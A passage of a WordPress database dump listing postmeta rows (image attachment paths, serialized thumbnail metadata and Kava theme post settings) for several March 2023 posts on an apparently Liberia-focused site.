),(36077,5304,'kava_extra_video_width','770'),(36078,5304,'kava_extra_video_height','480'),(36079,5304,'kava_extra_video_loop','false'),(36080,5304,'kava_extra_video_autoplay','false'),(36081,5304,'kava_extra_video_preload','false'),(36082,5307,'_edit_lock','1679570183:42'),(36083,5307,'_last_editor_used_jetpack','block-editor'),(36084,5308,'_wp_attached_file','2023/03/LLA.jpg'),(36085,5308,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2023/03/LLA.jpg\";s:8:\"filesize\";i:201888;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"LLA-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14825;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"LLA-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8065;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"LLA-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67587;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"LLA-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28573;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:14:\"LLA-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5217;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:15:\"LLA-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16289;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:15:\"LLA-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38661;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:15:\"LLA-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41476;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:15:\"LLA-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57574;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:15:\"LLA-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45894;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:15:\"LLA-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76905;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(36088,5307,'_wp_old_date','2023-03-23'),(36089,5307,'_thumbnail_id','5308'),(36090,5307,'_edit_last','42'),(36093,5307,'kava_extra_enable_breadcrumbs','inherit'),(36094,5307,'post_formats',''),(36095,5307,'gallery_tab',''),(36096,5307,'kava_extra_gallery_images',''),(36097,5307,'link_tab',''),(36098,5307,'kava_extra_link',''),(36099,5307,'kava_extra_link_target','_blank'),(36100,5307,'quote_tab',''),(36101,5307,'kava_extra_quote_text',''),(36102,5307,'kava_extra_quote_cite',''),(36103,5307,'audio_tab',''),(36104,5307,'kava_extra_audio',''),(36105,5307,'kava_extra_audio_loop','false'),(36106,5307,'kava_extra_audio_autoplay','false'),(36107,5307,'kava_extra_audio_preload','false'),(36108,5307,'video_tab',''),(36109,5307,'kava_extra_video_type','library'),(36110,5307,'kava_extra_video_library',''),(36111,5307,'kava_extra_video_external',''),(36112,5307,'kava_extra_video_poster',''),(36113,5307,'kava_extra_video_width','770'),(36114,5307,'kava_extra_video_height','480'),(36115,5307,'kava_extra_video_loop','false'),(36116,5307,'kava_extra_video_autoplay','false'),(36117,5307,'kava_extra_video_preload','false'),(36118,5310,'_edit_lock','1679570428:42'),(36119,5310,'_last_editor_used_jetpack','block-editor'),(36120,5311,'_wp_attached_file','2023/03/undp.jpg'),(36121,5311,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2023/03/undp.jpg\";s:8:\"filesize\";i:182494;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"undp-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13748;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"undp-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7069;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"undp-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59411;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"undp-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24635;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:15:\"undp-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5246;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:16:\"undp-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13578;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:16:\"undp-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31588;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:16:\"undp-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32379;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:16:\"undp-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49141;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:16:\"undp-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40423;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:16:\"undp-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67757;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(36124,5310,'_wp_old_date','2023-03-23'),(36125,5310,'_thumbnail_id','5311'),(36126,5310,'_edit_last','42'),(36127,5310,'kava_extra_enable_breadcrumbs','inherit'),(36128,5310,'post_formats',''),(36129,5310,'gallery_tab',''),(36130,5310,'kava_extra_gallery_images',''),(36131,5310,'link_tab',''),(36132,5310,'kava_extra_link',''),(36133,5310,'kava_extra_link_target','_blank'),(36134,5310,'quote_tab',''),(36135,5310,'kava_extra_quote_text',''),(36136,5310,'kava_extra_quote_cite',''),(36137,5310,'audio_tab',''),(36138,5310,'kava_extra_audio',''),(36139,5310,'kava_extra_audio_loop','false'),(36140,5310,'kava_extra_audio_autoplay','false'),(36141,5310,'kava_extra_audio_preload','false'),(36142,5310,'video_tab',''),(36143,5310,'kava_extra_video_type','library'),(36144,5310,'kava_extra_video_library',''),(36145,5310,'kava_extra_video_external',''),(36146,5310,'kava_extra_video_poster',''),(36147,5310,'kava_extra_video_width','770'),(36148,5310,'kava_extra_video_height','480'),(36149,5310,'kava_extra_video_loop','false'),(36150,5310,'kava_extra_video_autoplay','false'),(36151,5310,'kava_extra_video_preload','false'),(36152,5314,'_edit_lock','1680085635:42'),(36153,5314,'_last_editor_used_jetpack','block-editor'),(36154,5315,'_wp_attached_file','2023/03/DED.jpg'),(36155,5315,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2023/03/DED.jpg\";s:8:\"filesize\";i:205250;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"DED-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14836;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"DED-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7788;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"DED-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66384;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"DED-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27002;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:14:\"DED-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5286;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:15:\"DED-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15355;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:15:\"DED-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36189;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:15:\"DED-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39039;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:15:\"DED-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55036;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:15:\"DED-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44684;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:15:\"DED-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74749;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(36158,5314,'_wp_old_date','2023-03-29'),(36159,5314,'_thumbnail_id','5315'),(36160,5314,'_edit_last','42'),(36163,5314,'kava_extra_enable_breadcrumbs','inherit'),(36164,5314,'post_formats',''),(36165,5314,'gallery_tab',''),(36166,5314,'kava_extra_gallery_images',''),(36167,5314,'link_tab',''),(36168,5314,'kava_extra_link',''),(36169,5314,'kava_extra_link_target','_blank'),(36170,5314,'quote_tab',''),(36171,5314,'kava_extra_quote_text',''),(36172,5314,'kava_extra_quote_cite',''),(36173,5314,'audio_tab',''),(36174,5314,'kava_extra_audio',''),(36175,5314,'kava_extra_audio_loop','false'),(36176,5314,'kava_extra_audio_autoplay','false'),(36177,5314,'kava_extra_audio_preload','false'),(36178,5314,'video_tab',''),(36179,5314,'kava_extra_video_type','library'),(36180,5314,'kava_extra_video_library',''),(36181,5314,'kava_extra_video_external',''),(36182,5314,'kava_extra_video_poster',''),(36183,5314,'kava_extra_video_width','770'),(36184,5314,'kava_extra_video_height','480'),(36185,5314,'kava_extra_video_loop','false'),(36186,5314,'kava_extra_video_autoplay','false'),(36187,5314,'kava_extra_video_preload','false'),(36188,5317,'_edit_lock','1680086969:42'),(36189,5317,'_last_editor_used_jetpack','block-editor'),(36190,5318,'_wp_attached_file','2023/03/lla-1.jpg'),(36191,5318,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2023/03/lla-1.jpg\";s:8:\"filesize\";i:195925;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"lla-1-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13619;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"lla-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7394;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"lla-1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58299;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"lla-1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24283;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:16:\"lla-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5240;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:17:\"lla-1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14210;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:17:\"lla-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34841;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:17:\"lla-1-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39823;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:17:\"lla-1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51906;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:17:\"lla-1-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38992;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:17:\"lla-1-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77811;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(36194,5317,'_wp_old_date','2023-03-29'),(36195,5317,'_thumbnail_id','5318'),(36196,5317,'_edit_last','42'),(36197,5317,'kava_extra_enable_breadcrumbs','inherit'),(36198,5317,'post_formats',''),(36199,5317,'gallery_tab',''),(36200,5317,'kava_extra_gallery_images',''),(36201,5317,'link_tab',''),(36202,5317,'kava_extra_link',''),(36203,5317,'kava_extra_link_target','_blank'),(36204,5317,'quote_tab',''),(36205,5317,'kava_extra_quote_text',''),(36206,5317,'kava_extra_quote_cite',''),(36207,5317,'audio_tab',''),(36208,5317,'kava_extra_audio',''),(36209,5317,'kava_extra_audio_loop','false'),(36210,5317,'kava_extra_audio_autoplay','false'),(36211,5317,'kava_extra_audio_preload','false'),(36212,5317,'video_tab',''),(36213,5317,'kava_extra_video_type','library'),(36214,5317,'kava_extra_video_library',''),(36215,5317,'kava_extra_video_external',''),(36216,5317,'kava_extra_video_poster',''),(36217,5317,'kava_extra_video_width','770'),(36218,5317,'kava_extra_video_height','480'),(36219,5317,'kava_extra_video_loop','false'),(36220,5317,'kava_extra_video_autoplay','false'),(36221,5317,'kava_extra_video_preload','false'),(36222,5320,'_edit_lock','1680087489:42'),(36223,5320,'_last_editor_used_jetpack','block-editor'),(36224,5321,'_wp_attached_file','2023/03/Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook.png'),(36225,5321,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:78:\"2023/03/Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook.png\";s:8:\"filesize\";i:646376;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:78:\"Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:69851;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:78:\"Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35203;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:78:\"Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:343749;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:78:\"Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:123021;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:77:\"Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22743;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:78:\"Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:73057;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:78:\"Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:187817;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:78:\"Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:208354;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:78:\"Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:282685;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:78:\"Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:228984;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:78:\"Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:343556;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36228,5320,'_wp_old_date','2023-03-29'),(36229,5320,'_thumbnail_id','5321'),(36230,5320,'_edit_last','42'),(36231,5320,'kava_extra_enable_breadcrumbs','inherit'),(36232,5320,'post_formats',''),(36233,5320,'gallery_tab',''),(36234,5320,'kava_extra_gallery_images',''),(36235,5320,'link_tab',''),(36236,5320,'kava_extra_link',''),(36237,5320,'kava_extra_link_target','_blank'),(36238,5320,'quote_tab',''),(36239,5320,'kava_extra_quote_text',''),(36240,5320,'kava_extra_quote_cite',''),(36241,5320,'audio_tab',''),(36242,5320,'kava_extra_audio',''),(36243,5320,'kava_extra_audio_loop','false'),(36244,5320,'kava_extra_audio_autoplay','false'),(36245,5320,'kava_extra_audio_preload','false'),(36246,5320,'video_tab',''),(36247,5320,'kava_extra_video_type','library'),(36248,5320,'kava_extra_video_library',''),(36249,5320,'kava_extra_video_external',''),(36250,5320,'kava_extra_video_poster',''),(36251,5320,'kava_extra_video_width','770'),(36252,5320,'kava_extra_video_height','480'),(36253,5320,'kava_extra_video_loop','false'),(36254,5320,'kava_extra_video_autoplay','false'),(36255,5320,'kava_extra_video_preload','false'),(36256,5323,'_edit_lock','1680088010:42'),(36257,5323,'_last_editor_used_jetpack','block-editor'),(36258,5324,'_wp_attached_file','2023/03/MOA.png'),(36259,5324,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2023/03/MOA.png\";s:8:\"filesize\";i:1010782;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"MOA-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:107869;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"MOA-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:52665;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"MOA-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:549752;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"MOA-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:203603;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:14:\"MOA-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32349;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:15:\"MOA-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:113118;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:15:\"MOA-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:289011;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:15:\"MOA-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:298539;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:15:\"MOA-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:445453;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:15:\"MOA-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:363702;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:15:\"MOA-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:572030;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36262,5323,'_wp_old_date','2023-03-29'),(36263,5323,'_thumbnail_id','5324'),(36264,5323,'_edit_last','42'),(36265,5323,'kava_extra_enable_breadcrumbs','inherit'),(36266,5323,'post_formats',''),(36267,5323,'gallery_tab',''),(36268,5323,'kava_extra_gallery_images',''),(36269,5323,'link_tab',''),(36270,5323,'kava_extra_link',''),(36271,5323,'kava_extra_link_target','_blank'),(36272,5323,'quote_tab',''),(36273,5323,'kava_extra_quote_text',''),(36274,5323,'kava_extra_quote_cite',''),(36275,5323,'audio_tab',''),(36276,5323,'kava_extra_audio',''),(36277,5323,'kava_extra_audio_loop','false'),(36278,5323,'kava_extra_audio_autoplay','false'),(36279,5323,'kava_extra_audio_preload','false'),(36280,5323,'video_tab',''),(36281,5323,'kava_extra_video_type','library'),(36282,5323,'kava_extra_video_library',''),(36283,5323,'kava_extra_video_external',''),(36284,5323,'kava_extra_video_poster',''),(36285,5323,'kava_extra_video_width','770'),(36286,5323,'kava_extra_video_height','480'),(36287,5323,'kava_extra_video_loop','false'),(36288,5323,'kava_extra_video_autoplay','false'),(36289,5323,'kava_extra_video_preload','false'),(36290,5326,'_last_editor_used_jetpack','classic-editor'),(36291,5326,'_edit_lock','1680170802:42'),(36292,5326,'_edit_last','42'),(36293,5327,'_wp_attached_file','2023/03/Screenshot-2023-03-29-at-11-15-51-Liberia-National-Catalogue-of-Crop-Varieties-and-Species-2022.pdf.png'),(36294,5327,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:111:\"2023/03/Screenshot-2023-03-29-at-11-15-51-Liberia-National-Catalogue-of-Crop-Varieties-and-Species-2022.pdf.png\";s:8:\"filesize\";i:122528;s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:111:\"Screenshot-2023-03-29-at-11-15-51-Liberia-National-Catalogue-of-Crop-Varieties-and-Species-2022.pdf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31352;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:111:\"Screenshot-2023-03-29-at-11-15-51-Liberia-National-Catalogue-of-Crop-Varieties-and-Species-2022.pdf-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:108835;}s:12:\"kava-thumb-s\";a:5:{s:4:\"f